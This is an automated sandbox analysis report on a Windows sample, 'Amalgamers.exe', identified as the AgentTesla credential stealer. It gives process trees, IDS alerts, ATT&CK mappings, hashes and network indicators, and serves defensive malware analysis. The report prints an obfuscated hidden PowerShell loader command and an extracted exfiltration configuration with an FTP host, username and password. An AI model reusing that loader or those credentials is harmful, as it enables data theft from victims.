Windows
Analysis Report
Amalgamers.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Amalgamers.exe (PID: 7148 cmdline:
"C:\Users\ user\Deskt op\Amalgam ers.exe" MD5: E2A5B947AC8266E79CC0C9FAFF051849) - powershell.exe (PID: 6428 cmdline:
powershell .exe -wind owstyle hi dden "$Def ektes=Get- Content -R aw 'C:\Use rs\user\Ap pData\Loca l\Reglemen ts216\Akho ond106.Iml ';$Dermoos seous=$Def ektes.SubS tring(5532 8,3);.$Der moosseous( $Defektes) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - msiexec.exe (PID: 600 cmdline:
"C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-09T20:46:13.669638+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP |
2024-11-09T20:46:52.578190+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49736 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-09T20:47:13.762981+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49819 | 86.107.36.93 | 21 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-09T20:47:14.515003+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49835 | 86.107.36.93 | 35643 | TCP |
2024-11-09T20:47:14.520299+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49835 | 86.107.36.93 | 35643 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-09T20:47:08.054416+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49797 | 185.36.171.17 | 80 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Code function: | 0_2_004062A3 | |
Source: | Code function: | 0_2_00405768 | |
Source: | Code function: | 0_2_004026FE |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | FTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00405205 |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Process Stats: |
Source: | Code function: | 0_2_0040320C |
Source: | Code function: | 0_2_00404A44 | |
Source: | Code function: | 0_2_00406F54 | |
Source: | Code function: | 0_2_0040677D | |
Source: | Code function: | 6_2_02CC4A58 | |
Source: | Code function: | 6_2_02CCD220 | |
Source: | Code function: | 6_2_02CC4188 | |
Source: | Code function: | 6_2_02CC9BC8 | |
Source: | Code function: | 6_2_02CC3E40 | |
Source: | Code function: | 6_2_02CCD21A |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040320C |
Source: | Code function: | 0_2_004044D1 |
Source: | Code function: | 0_2_004020D1 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Code function: | 0_2_004062A3 | |
Source: | Code function: | 0_2_00405768 | |
Source: | Code function: | 0_2_004026FE |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3259 | ||
Source: | API call chain: | graph_0-3252 |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 6_2_02CC92F0 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_0040320C |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Software Packing | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 2 PowerShell | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 DLL Side-Loading | LSASS Memory | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 311 Process Injection | 1 Masquerading | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 131 Virtualization/Sandbox Evasion | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
58% | ReversingLabs | Win32.Trojan.Leonem |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
58% | ReversingLabs | Win32.Trojan.Leonem |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
abreo.pl | 185.36.171.17 | true | false | unknown | |
ftp.carbognin.it | 86.107.36.93 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.36.171.17 | abreo.pl | Poland | 57367 | ECO-ATMAN-PLECO-ATMAN-PL | false | |
86.107.36.93 | ftp.carbognin.it | Romania | 6910 | DIALTELECOMRO | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1552876 |
Start date and time: | 2024-11-09 20:45:04 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 7s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Amalgamers.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/17@2/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target msiexec.exe, PID 600 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Amalgamers.exe
Time | Type | Description |
---|---|---|
14:45:53 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
86.107.36.93 | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ftp.carbognin.it | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
DIALTELECOMRO | Get hash | malicious | DBatLoader, FormBook | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Sality | Browse |
| ||
Get hash | malicious | Sality, XWorm | Browse |
| ||
Get hash | malicious | Metasploit, Sality | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
ECO-ATMAN-PLECO-ATMAN-PL | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Stealc | Browse |
| |
Get hash | malicious | Stealc | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
|
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.992175361088568 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
MD5: | A35685B2B980F4BD3C6FD278EA661412 |
SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\Amalgamers.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55332 |
Entropy (8bit): | 5.353645282488102 |
Encrypted: | false |
SSDEEP: | 1536:W7TLdGG2daYXupOFS8WkIIUGKoqutVa5q:MTLdGG2daTH7uvaM |
MD5: | 238316EBDAA46CABC02E1A00873CD9F1 |
SHA1: | 0025BF9056BF6B4D8E7FBA5543D2129E55036E0B |
SHA-256: | 7E6E82376CB78683193983E6740D285784626A16930BB3FD68F416141EBB152D |
SHA-512: | 9C0D356CF90DA59F716CF975AA076B5ED5799344746211328BFBBF4D823004A3E9DD37F5E7A3EE9389B51A3F377D9983294068511C7DB593BB143502D313766B |
